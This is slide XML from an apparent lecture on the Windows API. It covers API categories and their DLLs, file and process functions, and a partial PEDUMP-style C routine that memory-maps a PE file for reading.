              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>Graphics Device </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>Interface</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> Provides functions to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>output graphics content </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>to monitors, printers, and other output </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>devices (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>gdi32.dll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>User </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>Interface</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Provides the functions to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>create and manage screen windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>most basic controls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, such as buttons and scrollbars, receive mouse and keyboard input, and other functions associated with the graphical user interface (GUI) part of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Windows (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>user32.dll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="296013714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API - Category</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>Common Dialog Box </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>Library</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Provides applications the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>standard dialog boxes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>to open and save files, choose </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>color</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> and font, etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>. (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>comdlg32.dll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>Common Control </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>Library</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Gives applications access to some advanced controls provided by the operating </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>system, i.e. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" smtClean="0"/>
              <a:t>status </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>bars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>progress bars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>toolbars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" smtClean="0"/>
              <a:t>tabs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>comctl32.dll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>). </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>Windows Shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Allows applications to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>access functions provided by the operating system shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, and to change and enhance it (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>shell32.dll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>Network Services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Give access to the various networking abilities of the operating </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>system, i.e. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" smtClean="0"/>
              <a:t>NetBIOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>Winsock</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" err="1"/>
              <a:t>NetDDE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, remote procedure call (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>RPC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>) and many more (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>netapi32.dll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>).</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17828943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7" y="-9933"/>
            <a:ext cx="9144000" cy="1124744"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>API (E.g.)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>File System </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>API Functions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>CreateFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>DeleteFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>ReadFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>(Ex); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>WriteFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>(Ex)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>FindFirstFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>(Ex); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>FindNextFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>FindClose</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>CreateFileMapping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>MapViewOfFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>UnmapViewOfFile</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>GetFileAttribute</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>E.g. PEDUMP.C</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>Process API Functions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>CreateToolhelp32Snapshot</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Process32First(W</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Process32Next</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>OpenProcess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>OpenThread</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>TerminateProcess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>TerminateThread</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32574838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5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="0"/>
            <a:ext cx="9036497" cy="6740307"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>void </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1"/>
              <a:t>DumpFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>(LPSTR filename)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>    HANDLE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1"/>
              <a:t>hFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>    HANDLE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1"/>
              <a:t>hFileMapping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>    LPVOID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1"/>
              <a:t>lpFileBase</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>    PIMAGE_DOS_HEADER </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1"/>
              <a:t>dosHeader</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1"/>
              <a:t>hFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>CreateFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>(filename, GENERIC_READ, FILE_SHARE_READ, NULL,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>                        OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0"/>
              <a:t>);              </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>    if ( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1"/>
              <a:t>hFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t> = = INVALID_HANDLE_VALUE )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>    {   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>("Couldn't open file with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1"/>
              <a:t>CreateFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>()\n");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>        return; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0"/>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1"/>
              <a:t>hFileMapping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>CreateFileMapping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1"/>
              <a:t>hFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>, NULL, PAGE_READONLY, 0, 0, NULL);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>    if ( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1"/>
              <a:t>hFileMapping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t> = = 0 )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>    {   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1"/>
              <a:t>CloseHandle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1"/>
              <a:t>hFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>("Couldn't open file mapping with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1"/>
              <a:t>CreateFileMapping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>()\n");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>        return; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0"/>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1"/>
              <a:t>lpFileBase</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>MapViewOfFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1"/>
              <a:t>hFileMapping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>, FILE_MAP_READ, 0, 0, 0);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>    if ( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1"/>
              <a:t>lpFileBase</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t> = = 0 )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>    {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1"/>
              <a:t>CloseHandle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1"/>
              <a:t>hFileMapping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1"/>
              <a:t>CloseHandle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1"/>
              <a:t>hFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>("Couldn't map view of file with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1"/>
              <a:t>MapViewOfFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>()\n");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>        return;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>    }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>("Dump of file %s\n\n", filename</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
